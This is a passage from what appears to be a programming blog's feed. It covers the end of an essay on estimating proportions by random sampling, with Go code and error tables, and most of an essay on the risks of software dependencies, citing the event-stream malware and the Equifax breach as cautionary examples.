too lazy to number the M&amp;Ms in order to use the Go program.) <p> <img name="sample-pjw2" class="center pad resizable" width=450 height=73 src="sample-pjw2.jpg" srcset="sample-pjw2.jpg 1x, sample-pjw2@2x.jpg 2x, sample-pjw2@4x.jpg 4x"> <p> Based on this estimate, we can estimate that 3/10 = 30% of my M&amp;Ms have Peter’s face. We can do it a few more times: <p> <img name="sample-pjw3" class="center pad resizable" width=450 height=64 src="sample-pjw3.jpg" srcset="sample-pjw3.jpg 1x, sample-pjw3@2x.jpg 2x, sample-pjw3@4x.jpg 4x"> <p> <img name="sample-pjw4" class="center pad resizable" width=450 height=61 src="sample-pjw4.jpg" srcset="sample-pjw4.jpg 1x, sample-pjw4@2x.jpg 2x, sample-pjw4@4x.jpg 4x"> <p> <img name="sample-pjw5" class="center pad resizable" width=450 height=73 src="sample-pjw5.jpg" srcset="sample-pjw5.jpg 1x, sample-pjw5@2x.jpg 2x, sample-pjw5@4x.jpg 4x"> <p> And we get a few new estimates: 30%, 40%, 20%. The actual fraction turns out to be 9/37 = 24.3%. These estimates are perhaps not that impressive, but we are only using 10 samples. With not too many more samples, we can get far more accurate estimates, even for much larger data sets. Suppose we had many more M&amp;Ms, again 24.3% Peter faces, and we sample 100 of them, or 1,000, or 10,000. Since we’re lazy, let’s write <a href="https://go.dev/play/p/VcqirSSiS1Q">a program to simulate the process</a>. <pre>$ go run sample.go 10: 40.0% 20.0% 30.0% 0.0% 10.0% 30.0% 10.0% 20.0% 20.0% 0.0% 100: 25.0% 26.0% 21.0% 26.0% 15.0% 25.0% 30.0% 30.0% 29.0% 20.0% 1000: 24.7% 23.8% 21.0% 25.4% 25.1% 24.2% 25.7% 22.9% 24.0% 23.8% 10000: 23.4% 24.6% 24.3% 24.3% 24.7% 24.6% 24.6% 24.7% 24.1% 25.0% $ </pre> <p> Accuracy improves fairly quickly: <ul> <li> With 10 samples, our estimates are accurate to within about 15%. <li> With 100 samples, our estimates are accurate to within about 5%. <li> With 1,000 samples, our estimates are accurate to within about 3%. <li> With 10,000 samples, our estimates are accurate to within about 1%.</ul> <p> Because we are estimating only the percentage of Peter faces, not the total number, the accuracy (also measured in percentages) does not depend on the total number of M&amp;Ms, only on the number of samples. So 10,000 samples is enough to get roughly 1% accuracy whether we have 100,000 M&amp;Ms, 1 million M&amp;Ms, or even 100 billion M&amp;Ms! In the last scenario, we have 1% accuracy despite only sampling 0.00001% of the M&amp;Ms. <p> <b>The magic of sampling is that we can derive accurate estimates about a very large population using a relatively small number of samples.</b> <p> Sampling turns many one-off estimations into jobs that are feasible to do by hand. For example, suppose we are considering revising an error-prone API and want to estimate how often that API is used incorrectly. If we have a way to randomly sample uses of the API (maybe <code>grep -Rn pkg.Func . | shuffle -m 100</code>), then manually checking 100 of them will give us an estimate that’s accurate to within 5% or so. And checking 1,000 of them, which may not take more than an hour or so if they’re easy to eyeball, improves the accuracy to 1.5% or so. Real data to decide an important question is usually well worth a small amount of manual effort. <p> For the kinds of decisions I look at related to Go, this approach comes up all the time: What fraction of <code>for</code> loops in real code have a <a href="https://github.com/golang/go/discussions/56010">loop scoping bug</a>? What fraction of warnings by a new <code>go</code> <code>vet</code> check are false positives? What fraction of modules have no dependencies? These are drawn from my experience, and so they may seem specific to Go or to language development, but once you realize that sampling makes accurate estimates so easy to come by, all kind of uses present themselves. Any time you have a large data set, <pre>select * from data order by random() limit 1000; </pre> <p> is a very effective way to get a data set you can analyze by hand and still derive many useful conclusions from. <a class=anchor href="#accuracy"><h2 id="accuracy">Accuracy</h2></a> <p> Let’s work out what accuracy we should expect from these estimates. The brute force approach would be to run many samples of a given size and calculate the accuracy for each. <a href="https://go.dev/play/p/NWUOanCpFtl">This program</a> runs 1,000 trials of 100 samples each, calculating the observed error for each estimate and then printing them all in sorted order. If we plot those points one after the other along the x axis, we get a picture like this: <p> <img name="sample1" class="center pad" width=370 height=369 src="sample1.png" srcset="sample1.png 1x, sample1@2x.png 2x"> <p> The <a href="https://9fans.github.io/plan9port/man/man1/gview.html">data viewer I’m using in this screenshot</a> has scaled the x-axis labels by a factor of 1,000 (“x in thousands”). Eyeballing the scatterplot, we can see that half the time the error is under 3%, and 80% of the time the error is under 5½%. <p> We might wonder at this point whether the error depends on the actual answer (24.3% in our programs so far). It does: the error will be lower when the population is lopsided. Obviously, if the M&amp;Ms are 0% or 100% Peter faces, our estimates will have no error at all. In a slightly less degenerate case, if the M&amp;Ms are 1% or 99% Peter faces, the most likely estimate from just a few samples is 0% or 100%, which has only 1% error. It turns out that, in general, the error is maximized when the actual fraction is 50%, so <a href="https://go.dev/play/p/Vm2s1SwlKKT">we’ll use that</a> for the rest of the analysis. <p> With an actual fraction of 50%, 1,000 sorted errors from estimating by sampling 100 values look like: <p> <img name="sample2" class="center pad" width=369 height=369 src="sample2.png" srcset="sample2.png 1x, sample2@2x.png 2x"> <p> The errors are a bit larger. Now the half the time the error is 4% and 80% of the time the error is 6%. Zooming in on the tail end of the plot produces: <p> <img name="sample3" class="center pad" width=390 height=368 src="sample3.png" srcset="sample3.png 1x, sample3@2x.png 2x"> <p> We can see that 90% of the trials have error 8% or less, 95% of the trials have error 10% or less, and 99% of the trials have error 12% or less. The statistical way to phrase those statements is that “a sample of size N = 100 produces a margin of error of 8% with 90% confidence, 10% with 95% confidence, and 12% with 99% confidence.” <p> Instead of eyeballing the graphs, we can <a href="https://go.dev/play/p/Xq7WMyrNWxq">update the program</a> to compute these numbers directly. <pre>$ go run sample.go N = 10: 90%: 30.00% 95%: 30.00% 99%: 40.00% N = 100: 90%: 9.00% 95%: 11.00% 99%: 13.00% N = 1000: 90%: 2.70% 95%: 3.20% 99%: 4.30% N = 10000: 90%: 0.82% 95%: 0.98% 99%: 1.24% $ </pre> <p> There is something meta about using sampling (of trials) to estimate the errors introduced by sampling of an actual distribution. What about the error being introduced by sampling the errors? We could instead write a program to count all possible outcomes and calculate the exact error distribution, but counting won’t work for larger sample sizes. Luckily, others have done the math for us and even implemented the relevant functions in Go’s standard <a href="https://pkg.go.dev/math">math package</a>. The margin of error for a given confidence level and sample size is: <pre>func moe(confidence float64, N int) float64 { return math.Erfinv(confidence) / math.Sqrt(2 * float64(N)) } </pre> <p> That lets us compute the table <a href="https://go.dev/play/p/DKeNfDwLmJZ">more directly</a>. <pre>$ go run sample.go N = 10: 90%: 26.01% 95%: 30.99% 99%: 40.73% N = 20: 90%: 18.39% 95%: 21.91% 99%: 28.80% N = 50: 90%: 11.63% 95%: 13.86% 99%: 18.21% N = 100: 90%: 8.22% 95%: 9.80% 99%: 12.88% N = 200: 90%: 5.82% 95%: 6.93% 99%: 9.11% N = 500: 90%: 3.68% 95%: 4.38% 99%: 5.76% N = 1000: 90%: 2.60% 95%: 3.10% 99%: 4.07% N = 2000: 90%: 1.84% 95%: 2.19% 99%: 2.88% N = 5000: 90%: 1.16% 95%: 1.39% 99%: 1.82% N = 10000: 90%: 0.82% 95%: 0.98% 99%: 1.29% N = 20000: 90%: 0.58% 95%: 0.69% 99%: 0.91% N = 50000: 90%: 0.37% 95%: 0.44% 99%: 0.58% N = 100000: 90%: 0.26% 95%: 0.31% 99%: 0.41% $ </pre> <p> We can also reverse the equation to compute the necessary sample size from a given confidence level and margin of error: <pre>func N(confidence, moe float64) int { return int(math.Ceil(0.5 * math.Pow(math.Erfinv(confidence)/moe, 2))) } </pre> <p> That lets us <a href="https://go.dev/play/p/Y81_FORHvw5">compute this table</a>. <pre>$ go run sample.go moe = 5%: 90%: 271 95%: 385 99%: 664 moe = 2%: 90%: 1691 95%: 2401 99%: 4147 moe = 1%: 90%: 6764 95%: 9604 99%: 16588 $ </pre> <a class=anchor href="#limitations"><h2 id="limitations">Limitations</h2></a> <p> To accurately estimate the fraction of items with a given property, like M&amp;Ms with Peter faces, each item must have the same chance of being selected, as each M&amp;M did. Suppose instead that we had ten bags of M&amp;Ms: nine one-pound bags with 500 M&amp;Ms each, and a small bag containing the 37 M&amp;Ms we used before. If we want to estimate the fraction of M&amp;Ms with Peter faces, it would not work to sample by first picking a bag at random and then picking an M&amp;M at random from the bag. The chance of picking any specific M&amp;M from a one-pound bag would be 1/10 × 1/500 = 1/5,000, while the chance of picking any specific M&amp;M from the small bag would be 1/10 × 1/37 = 1/370. We would end up with an estimate of around 9/370 = 2.4% Peter faces, even though the actual answer is 9/(9×500+37) = 0.2% Peter faces. <p> The problem here is not the kind of random sampling error that we computed in the previous section. Instead it is a systematic error caused by a sampling mechanism that does not align with the statistic being estimated. We could recover an accurate estimate by weighting an M&amp;M found in the small bag as only w = 37/500 of an M&amp;M in both the numerator and denominator of any estimate. For example, if we picked 100 M&amp;Ms with replacement from each bag and found 24 Peter faces in the small bag, then instead of 24/1000 = 2.4% we would compute 24w/(900+100w) = 0.2%. <p> As a less contrived example, <a href="https://go.dev/blog/pprof">Go’s memory profiler</a> aims to sample approximately one allocation per half-megabyte allocated and then derive statistics about where programs allocate memory. Roughly speaking, to do this the profiler maintains a sampling trigger, initialized to a random number between 0 and one million. Each time a new object is allocated, the profiler decrements the trigger by the size of the object. When an allocation decrements the trigger below zero, the profiler samples that allocation and then resets the trigger to a new random number between 0 and one million. <p> This byte-based sampling means that to estimate the fraction of bytes allocated in a given function, the profiler can divide the total sampled bytes allocated in that function divided by the total sampled bytes allocated in the entire program. Using the same approach to estimate the fraction of <i>objects</i> allocated in a given function would be inaccurate: it would overcount large objects and undercount small ones, because large objects are more likely to be sampled. In order to recover accurate statistics about allocation counts, the profiler applies a size-based weighting function during the calcuation, just as in the M&amp;M example. (This is the reverse of the situation with the M&amp;Ms: we are randomly sampling individual bytes of allocated memory but now want statistics about their “bags”.) <p> It is not always possible to undo skewed sampling, and the skew makes margin of error calculation more difficult too. It is almost always better to make sure that the sampling is aligned with the statistic you want to compute. Our Software Dependency Problem tag:research.swtch.com,2012:research.swtch.com/deps 2019-01-23T11:00:00-05:00 2019-01-23T11:02:00-05:00 Download and run code from strangers on the internet. What could go wrong? <p> For decades, discussion of software reuse was far more common than actual software reuse. Today, the situation is reversed: developers reuse software written by others every day, in the form of software dependencies, and the situation goes mostly unexamined. <p> My own background includes a decade of working with Google’s internal source code system, which treats software dependencies as a first-class concept,<a class=footnote id=body1 href="#note1"><sup>1</sup></a> and also developing support for dependencies in the Go programming language.<a class=footnote id=body2 href="#note2"><sup>2</sup></a> <p> Software dependencies carry with them serious risks that are too often overlooked. The shift to easy, fine-grained software reuse has happened so quickly that we do not yet understand the best practices for choosing and using dependencies effectively, or even for deciding when they are appropriate and when not. My purpose in writing this article is to raise awareness of the risks and encourage more investigation of solutions. <a class=anchor href="#what_is_a_dependency"><h2 id="what_is_a_dependency">What is a dependency?</h2></a> <p> In today’s software development world, a <i>dependency</i> is additional code that you want to call from your program. Adding a dependency avoids repeating work already done: designing, writing, testing, debugging, and maintaining a specific unit of code. In this article we’ll call that unit of code a <i>package</i>; some systems use terms like library or module instead of package. <p> Taking on externally-written dependencies is an old practice: most programmers have at one point in their careers had to go through the steps of manually downloading and installing a required library, like C’s PCRE or zlib, or C++’s Boost or Qt, or Java’s JodaTime or JUnit. These packages contain high-quality, debugged code that required significant expertise to develop. For a program that needs the functionality provided by one of these packages, the tedious work of manually downloading, installing, and updating the package is easier than the work of redeveloping that functionality from scratch. But the high fixed costs of reuse mean that manually-reused packages tend to be big: a tiny package would be easier to reimplement. <p> A <i>dependency manager</i> (sometimes called a package manager) automates the downloading and installation of dependency packages. As dependency managers make individual packages easier to download and install, the lower fixed costs make smaller packages economical to publish and reuse. <p> For example, the Node.js dependency manager NPM provides access to over 750,000 packages. One of them, <code>escape-string-regexp</code>, provides a single function that escapes regular expression operators in its input. The entire implementation is: <pre>var matchOperatorsRe = /[|\\{}()[\]^$+*?.]/g; module.exports = function (str) { if (typeof str !== 'string') { throw new TypeError('Expected a string'); } return str.replace(matchOperatorsRe, '\\$&amp;'); }; </pre> <p> Before dependency managers, publishing an eight-line code library would have been unthinkable: too much overhead for too little benefit. But NPM has driven the overhead approximately to zero, with the result that nearly-trivial functionality can be packaged and reused. In late January 2019, the <code>escape-string-regexp</code> package is explicitly depended upon by almost a thousand other NPM packages, not to mention all the packages developers write for their own use and don’t share. <p> Dependency managers now exist for essentially every programming language. Maven Central (Java), Nuget (.NET), Packagist (PHP), PyPI (Python), and RubyGems (Ruby) each host over 100,000 packages. The arrival of this kind of fine-grained, widespread software reuse is one of the most consequential shifts in software development over the past two decades. And if we’re not more careful, it will lead to serious problems. <a class=anchor href="#what_could_go_wrong"><h2 id="what_could_go_wrong">What could go wrong?</h2></a> <p> A package, for this discussion, is code you download from the internet. Adding a package as a dependency outsources the work of developing that code—designing, writing, testing, debugging, and maintaining—to someone else on the internet, someone you often don’t know. By using that code, you are exposing your own program to all the failures and flaws in the dependency. Your program’s execution now literally <i>depends</i> on code downloaded from this stranger on the internet. Presented this way, it sounds incredibly unsafe. Why would anyone do this? <p> We do this because it’s easy, because it seems to work, because everyone else is doing it too, and, most importantly, because it seems like a natural continuation of age-old established practice. But there are important differences we’re ignoring. <p> Decades ago, most developers already trusted others to write software they depended on, such as operating systems and compilers. That software was bought from known sources, often with some kind of support agreement. There was still a potential for bugs or outright mischief,<a class=footnote id=body3 href="#note3"><sup>3</sup></a> but at least we knew who we were dealing with and usually had commercial or legal recourses available. <p> The phenomenon of open-source software, distributed at no cost over the internet, has displaced many of those earlier software purchases. When reuse was difficult, there were fewer projects publishing reusable code packages. Even though their licenses typically disclaimed, among other things, any “implied warranties of merchantability and fitness for a particular purpose,” the projects built up well-known reputations that often factored heavily into people’s decisions about which to use. The commercial and legal support for trusting our software sources was replaced by reputational support. Many common early packages still enjoy good reputations: consider BLAS (published 1979), Netlib (1987), libjpeg (1991), LAPACK (1992), HP STL (1994), and zlib (1995). <p> Dependency managers have scaled this open-source code reuse model down: now, developers can share code at the granularity of individual functions of tens of lines. This is a major technical accomplishment. There are myriad available packages, and writing code can involve such a large number of them, but the commercial, legal, and reputational support mechanisms for trusting the code have not carried over. We are trusting more code with less justification for doing so. <p> The cost of adopting a bad dependency can be viewed as the sum, over all possible bad outcomes, of the cost of each bad outcome multiplied by its probability of happening (risk). <p> <img name="deps-cost" class="center pad" width=383 height=95 src="deps-cost.png" srcset="deps-cost.png 1x, deps-cost@1.5x.png 1.5x, deps-cost@2x.png 2x, deps-cost@3x.png 3x, deps-cost@4x.png 4x"> <p> The context where a dependency will be used determines the cost of a bad outcome. At one end of the spectrum is a personal hobby project, where the cost of most bad outcomes is near zero: you’re just having fun, bugs have no real impact other than wasting some time, and even debugging them can be fun. So the risk probability almost doesn’t matter: it’s being multiplied by zero. At the other end of the spectrum is production software that must be maintained for years. Here, the cost of a bug in a dependency can be very high: servers may go down, sensitive data may be divulged, customers may be harmed, companies may fail. High failure costs make it much more important to estimate and then reduce any risk of a serious failure. <p> No matter what the expected cost, experiences with larger dependencies suggest some approaches for estimating and reducing the risks of adding a software dependency. It is likely that better tooling is needed to help reduce the costs of these approaches, much as dependency managers have focused to date on reducing the costs of download and installation. <a class=anchor href="#inspect_the_dependency"><h2 id="inspect_the_dependency">Inspect the dependency</h2></a> <p> You would not hire a software developer you’ve never heard of and know nothing about. You would learn more about them first: check references, conduct a job interview, run background checks, and so on. Before you depend on a package you found on the internet, it is similarly prudent to learn a bit about it first. <p> A basic inspection can give you a sense of how likely you are to run into problems trying to use this code. If the inspection reveals likely minor problems, you can take steps to prepare for or maybe avoid them. If the inspection reveals major problems, it may be best not to use the package: maybe you’ll find a more suitable one, or maybe you need to develop one yourself. Remember that open-source packages are published by their authors in the hope that they will be useful but with no guarantee of usability or support. In the middle of a production outage, you’ll be the one debugging it. As the original GNU General Public License warned, “The entire risk as to the quality and performance of the program is with you. Should the program prove defective, you assume the cost of all necessary servicing, repair or correction.”<a class=footnote id=body4 href="#note4"><sup>4</sup></a> <p> The rest of this section outlines some considerations when inspecting a package and deciding whether to depend on it. <a class=anchor href="#design"><h3 id="design">Design</h3></a> <p> Is package’s documentation clear? Does the API have a clear design? If the authors can explain the package’s API and its design well to you, the user, in the documentation, that increases the likelihood they have explained the implementation well to the computer, in the source code. Writing code for a clear, well-designed API is also easier, faster, and hopefully less error-prone. Have the authors documented what they expect from client code in order to make future upgrades compatible? (Examples include the C++<a class=footnote id=body5 href="#note5"><sup>5</sup></a> and Go<a class=footnote id=body6 href="#note6"><sup>6</sup></a> compatibility documents.) <a class=anchor href="#code_quality"><h3 id="code_quality">Code Quality</h3></a> <p> Is the code well-written? Read some of it. Does it look like the authors have been careful, conscientious, and consistent? Does it look like code you’d want to debug? You may need to. <p> Develop your own systematic ways to check code quality. For example, something as simple as compiling a C or C++ program with important compiler warnings enabled (for example, <code>-Wall</code>) can give you a sense of how seriously the developers work to avoid various undefined behaviors. Recent languages like Go, Rust, and Swift use an <code>unsafe</code> keyword to mark code that violates the type system; look to see how much unsafe code there is. More advanced semantic tools like Infer<a class=footnote id=body7 href="#note7"><sup>7</sup></a> or SpotBugs<a class=footnote id=body8 href="#note8"><sup>8</sup></a> are helpful too. Linters are less helpful: you should ignore rote suggestions about topics like brace style and focus instead on semantic problems. <p> Keep an open mind to development practices you may not be familiar with. For example, the SQLite library ships as a single 200,000-line C source file and a single 11,000-line header, the “amalgamation.” The sheer size of these files should raise an initial red flag, but closer investigation would turn up the actual development source code, a traditional file tree with over a hundred C source files, tests, and support scripts. It turns out that the single-file distribution is built automatically from the original sources and is easier for end users, especially those without dependency managers. (The compiled code also runs faster, because the compiler can see more optimization opportunities.) <a class=anchor href="#testing"><h3 id="testing">Testing</h3></a> <p> Does the code have tests? Can you run them? Do they pass? Tests establish that the code’s basic functionality is correct, and they signal that the developer is serious about keeping it correct. For example, the SQLite development tree has an incredibly thorough test suite with over 30,000 individual test cases as well as developer documentation explaining the testing strategy.<a class=footnote id=body9 href="#note9"><sup>9</sup></a> On the other hand, if there are few tests or no tests, or if the tests fail, that’s a serious red flag: future changes to the package are likely to introduce regressions that could easily have been caught. If you insist on tests in code you write yourself (you do, right?), you should insist on tests in code you outsource to others. <p> Assuming the tests exist, run, and pass, you can gather more information by running them with run-time instrumentation like code coverage analysis, race detection,<a class=footnote id=body10 href="#note10"><sup>10</sup></a> memory allocation checking, and memory leak detection. <a class=anchor href="#debugging"><h3 id="debugging">Debugging</h3></a> <p> Find the package’s issue tracker. Are there many open bug reports? How long have they been open? Are there many fixed bugs? Have any bugs been fixed recently? If you see lots of open issues about what look like real bugs, especially if they have been open for a long time, that’s not a good sign. On the other hand, if the closed issues show that bugs are rarely found and promptly fixed, that’s great. <a class=anchor href="#maintenance"><h3 id="maintenance">Maintenance</h3></a> <p> Look at the package’s commit history. How long has the code been actively maintained? Is it actively maintained now? Packages that have been actively maintained for an extended amount of time are more likely to continue to be maintained. How many people work on the package? Many packages are personal projects that developers create and share for fun in their spare time. Others are the result of thousands of hours of work by a group of paid developers. In general, the latter kind of package is more likely to have prompt bug fixes, steady improvements, and general upkeep. <p> On the other hand, some code really is “done.” For example, NPM’s <code>escape-string-regexp</code>, shown earlier, may never need to be modified again. <a class=anchor href="#usage"><h3 id="usage">Usage</h3></a> <p> Do many other packages depend on this code? Dependency managers can often provide statistics about usage, or you can use a web search to estimate how often others write about using the package. More users should at least mean more people for whom the code works well enough, along with faster detection of new bugs. Widespread usage is also a hedge against the question of continued maintenance: if a widely-used package loses its maintainer, an interested user is likely to step forward. <p> For example, libraries like PCRE or Boost or JUnit are incredibly widely used. That makes it more likely—although certainly not guaranteed—that bugs you might otherwise run into have already been fixed, because others ran into them first. <a class=anchor href="#security"><h3 id="security">Security</h3></a> <p> Will you be processing untrusted inputs with the package? If so, does it seem to be robust against malicious inputs? Does it have a history of security problems listed in the National Vulnerability Database (NVD)?<a class=footnote id=body11 href="#note11"><sup>11</sup></a> <p> For example, when Jeff Dean and I started work on Google Code Search<a class=footnote id=body12 href="#note12"><sup>12</sup></a>—<code>grep</code> over public source code—in 2006, the popular PCRE regular expression library seemed like an obvious choice. In an early discussion with Google’s security team, however, we learned that PCRE had a history of problems like buffer overflows, especially in its parser. We could have learned the same by searching for PCRE in the NVD. That discovery didn’t immediately cause us to abandon PCRE, but it did make us think more carefully about testing and isolation. <a class=anchor href="#licensing"><h3 id="licensing">Licensing</h3></a> <p> Is the code properly licensed? Does it have a license at all? Is the license acceptable for your project or company? A surprising fraction of projects on GitHub have no clear license. Your project or company may impose further restrictions on the allowed licenses of dependencies. For example, Google disallows the use of code licensed under AGPL-like licenses (too onerous) as well as WTFPL-like licenses (too vague).<a class=footnote id=body13 href="#note13"><sup>13</sup></a> <a class=anchor href="#dependencies"><h3 id="dependencies">Dependencies</h3></a> <p> Does the code have dependencies of its own? Flaws in indirect dependencies are just as bad for your program as flaws in direct dependencies. Dependency managers can list all the transitive dependencies of a given package, and each of them should ideally be inspected as described in this section. A package with many dependencies incurs additional inspection work, because those same dependencies incur additional risk that needs to be evaluated. <p> Many developers have never looked at the full list of transitive dependencies of their code and don’t know what they depend on. For example, in March 2016 the NPM user community discovered that many popular projects—including Babel, Ember, and React—all depended indirectly on a tiny package called <code>left-pad</code>, consisting of a single 8-line function body. They discovered this when the author of <code>left-pad</code> deleted that package from NPM, inadvertently breaking most Node.js users’ builds.<a class=footnote id=body14 href="#note14"><sup>14</sup></a> And <code>left-pad</code> is hardly exceptional in this regard. For example, 30% of the 750,000 packages published on NPM depend—at least indirectly—on <code>escape-string-regexp</code>. Adapting Leslie Lamport’s observation about distributed systems, a dependency manager can easily create a situation in which the failure of a package you didn’t even know existed can render your own code unusable. <a class=anchor href="#test_the_dependency"><h2 id="test_the_dependency">Test the dependency</h2></a> <p> The inspection process should include running a package’s own tests. If the package passes the inspection and you decide to make your project depend on it, the next step should be to write new tests focused on the functionality needed by your application. These tests often start out as short standalone programs written to make sure you can understand the package’s API and that it does what you think it does. (If you can’t or it doesn’t, turn back now!) It is worth then taking the extra effort to turn those programs into automated tests that can be run against newer versions of the package. If you find a bug and have a potential fix, you’ll want to be able to rerun these project-specific tests easily, to make sure that the fix did not break anything else. <p> It is especially worth exercising the likely problem areas identified by the basic inspection. For Code Search, we knew from past experience that PCRE sometimes took a long time to execute certain regular expression searches. Our initial plan was to have separate thread pools for “simple” and “complicated” regular expression searches. One of the first tests we ran was a benchmark, comparing <code>pcregrep</code> with a few other <code>grep</code> implementations. When we found that, for one basic test case, <code>pcregrep</code> was 70X slower than the fastest <code>grep</code> available, we started to rethink our plan to use PCRE. Even though we eventually dropped PCRE entirely, that benchmark remains in our code base today. <a class=anchor href="#abstract_the_dependency"><h2 id="abstract_the_dependency">Abstract the dependency</h2></a> <p> Depending on a package is a decision that you are likely to revisit later. Perhaps updates will take the package in a new direction. Perhaps serious security problems will be found. Perhaps a better option will come along. For all these reasons, it is worth the effort to make it easy to migrate your project to a new dependency. <p> If the package will be used from many places in your project’s source code, migrating to a new dependency would require making changes to all those different source locations. Worse, if the package will be exposed in your own project’s API, migrating to a new dependency would require making changes in all the code calling your API, which you might not control. To avoid these costs, it makes sense to define an interface of your own, along with a thin wrapper implementing that interface using the dependency. Note that the wrapper should include only what your project needs from the dependency, not everything the dependency offers. Ideally, that allows you to substitute a different, equally appropriate dependency later, by changing only the wrapper. Migrating your per-project tests to use the new interface tests the interface and wrapper implementation and also makes it easy to test any potential replacements for the dependency. <p> For Code Search, we developed an abstract <code>Regexp</code> class that defined the interface Code Search needed from any regular expression engine. Then we wrote a thin wrapper around PCRE implementing that interface. The indirection made it easy to test alternate libraries, and it kept us from accidentally introducing knowledge of PCRE internals into the rest of the source tree. That in turn ensured that it would be easy to switch to a different dependency if needed. <a class=anchor href="#isolate_the_dependency"><h2 id="isolate_the_dependency">Isolate the dependency</h2></a> <p> It may also be appropriate to isolate a dependency at run-time, to limit the possible damage caused by bugs in it. For example, Google Chrome allows users to add dependencies—extension code—to the browser. When Chrome launched in 2008, it introduced the critical feature (now standard in all browsers) of isolating each extension in a sandbox running in a separate operating-system process.<a class=footnote id=body15 href="#note15"><sup>15</sup></a> An exploitable bug in an badly-written extension therefore did not automatically have access to the entire memory of the browser itself and could be stopped from making inappropriate system calls.<a class=footnote id=body16 href="#note16"><sup>16</sup></a> For Code Search, until we dropped PCRE entirely, our plan was to isolate at least the PCRE parser in a similar sandbox. Today, another option would be a lightweight hypervisor-based sandbox like gVisor.<a class=footnote id=body17 href="#note17"><sup>17</sup></a> Isolating dependencies reduces the associated risks of running that code. <p> Even with these examples and other off-the-shelf options, run-time isolation of suspect code is still too difficult and rarely done. True isolation would require a completely memory-safe language, with no escape hatch into untyped code. That’s challenging not just in entirely unsafe languages like C and C++ but also in languages that provide restricted unsafe operations, like Java when including JNI, or like Go, Rust, and Swift when including their “unsafe” features. Even in a memory-safe language like JavaScript, code often has access to far more than it needs. In November 2018, the latest version of the NPM package <code>event-stream</code>, which provided a functional streaming API for JavaScript events, was discovered to contain obfuscated malicious code that had been added two and a half months earlier. The code, which harvested large Bitcoin wallets from users of the Copay mobile app, was accessing system resources entirely unrelated to processing event streams.<a class=footnote id=body18 href="#note18"><sup>18</sup></a> One of many possible defenses to this kind of problem would be to better restrict what dependencies can access. <a class=anchor href="#avoid_the_dependency"><h2 id="avoid_the_dependency">Avoid the dependency</h2></a> <p> If a dependency seems too risky and you can’t find a way to isolate it, the best answer may be to avoid it entirely, or at least to avoid the parts you’ve identified as most problematic. <p> For example, as we better understood the risks and costs associated with PCRE, our plan for Google Code Search evolved from “use PCRE directly,” to “use PCRE but sandbox the parser,” to “write a new regular expression parser but keep the PCRE execution engine,” to “write a new parser and connect it to a different, more efficient open-source execution engine.” Later we rewrote the execution engine as well, so that no dependencies were left, and we open-sourced the result: RE2.<a class=footnote id=body19 href="#note19"><sup>19</sup></a> <p> If you only need a tiny fraction of a dependency, it may be simplest to make a copy of what you need (preserving appropriate copyright and other legal notices, of course). You are taking on responsibility for fixing bugs, maintenance, and so on, but you’re also completely isolated from the larger risks. The Go developer community has a proverb about this: “A little copying is better than a little dependency.”<a class=footnote id=body20 href="#note20"><sup>20</sup></a> <a class=anchor href="#upgrade_the_dependency"><h2 id="upgrade_the_dependency">Upgrade the dependency</h2></a> <p> For a long time, the conventional wisdom about software was “if it ain’t broke, don’t fix it.” Upgrading carries a chance of introducing new bugs; without a corresponding reward—like a new feature you need—why take the risk? This analysis ignores two costs. The first is the cost of the eventual upgrade. In software, the difficulty of making code changes does not scale linearly: making ten small changes is less work and easier to get right than making one equivalent large change. The second is the cost of discovering already-fixed bugs the hard way. Especially in a security context, where known bugs are actively exploited, every day you wait is another day that attackers can break in. <p> For example, consider the year 2017 at Equifax, as recounted by executives in detailed congressional testimony.<a class=footnote id=body21 href="#note21"><sup>21</sup></a> On March 7, a new vulnerability in Apache Struts was disclosed, and a patched version was released. On March 8, Equifax received a notice from US-CERT about the need to update any uses of Apache Struts. Equifax ran source code and network scans on March 9 and March 15, respectively; neither scan turned up a particular group of public-facing web servers. On May 13, attackers found the servers that Equifax’s security teams could not. They used the Apache Struts vulnerability to breach Equifax’s network and then steal detailed personal and financial information about 148 million people over the next two months. Equifax finally noticed the breach on July 29 and publicly disclosed it on September 4. By the end of September, Equifax’s CEO, CIO, and CSO had all resigned, and a congressional investigation was underway. <p> Equifax’s experience drives home the point that although dependency managers know the versions they are using at build time, you need other arrangements to track that information through your production deployment process. For the Go language, we are experimenting with automatically including a version manifest in every binary, so that deployment processes can scan binaries for dependencies that need upgrading. Go also makes that information available at run-time, so that servers can consult databases of known bugs and self-report to monitoring software when they are in need of upgrades. <p> Upgrading promptly is important, but upgrading means adding new code to your project, which should mean updating your evaluation of the risks of using the dependency based on the new version. As minimum, you’d want to skim the diffs showing the changes being made from the current version to the upgraded versions, or at least read the release notes, to identify the most likely areas of concern in the upgraded code. If a lot of code is changing, so that the diffs are difficult to digest, that is also information you can incorporate into your risk assessment update. <p> You’ll also want to re-run the tests you’ve written that are specific to your project, to make sure the upgraded package is at least as suitable for the project as the earlier version. It also makes sense to re-run the package’s own tests. If the package has its own dependencies, it is entirely possible that your project’s configuration uses different versions of those dependencies (either older or newer ones) than the package’s authors use. Running the package’s own tests can quickly identify problems specific to your configuration. <p> Again, upgrades should not be completely automatic. You need to verify that the upgraded versions are appropriate for your environment before deploying them.<a class=footnote id=body22 href="#note22"><sup>22</sup></a> <p> If your upgrade process includes re-running the integration and qualification tests you’ve already written for the dependency, so that you are likely to identify new problems before they reach production, then, in most cases, delaying an upgrade is riskier than upgrading quickly. <p> The window for security-critical upgrades is especially short. In the aftermath of the Equifax breach, forensic security teams found evidence that attackers (perhaps different ones) had successfully exploited the Apache Struts vulnerability on the affected servers on March 10, only three days after it was publicly disclosed, but they’d only run a single <code>whoami</code> command. <a class=anchor href="#watch_your_dependencies"><h2 id="watch_your_dependencies">Watch your dependencies</h2></a> <p> Even after all that work, you’re not done tending your dependencies. It’s important to continue to monitor them and perhaps even re-evaluate your decision to use them. <p> First, make sure that you keep using the specific package versions you think you are. Most dependency managers now make it easy or even automatic to record the cryptographic hash of the expected source code for a given package version and then to check that hash when re-downloading the package on another computer or in a test environment. This ensures that your build use the same dependency source code you inspected and tested. These kinds of checks prevented the <code>event-stream</code> attacker, described earlier, from silently inserting malicious code in the already-released version 3.3.5. Instead, the attacker had to create a new version, 3.3.6, and wait for people to upgrade (without looking closely at the changes). <p> It is also important to watch for new indirect dependencies creeping in: upgrades can easily introduce new packages upon which the success of your project now depends. They deserve your attention as well. In the case of <code>event-stream</code>, the malicious code was hidden in a different package, <code>flatmap-stream</code>, which the new <code>event-stream</code> release added as a new dependency. <p> Creeping dependencies can also affect the size of your project. During the development of Google’s Sawzall<a class=footnote id=body23 href="#note23"><sup>23</sup></a>—a JIT’ed logs processing language—the authors discovered at various times 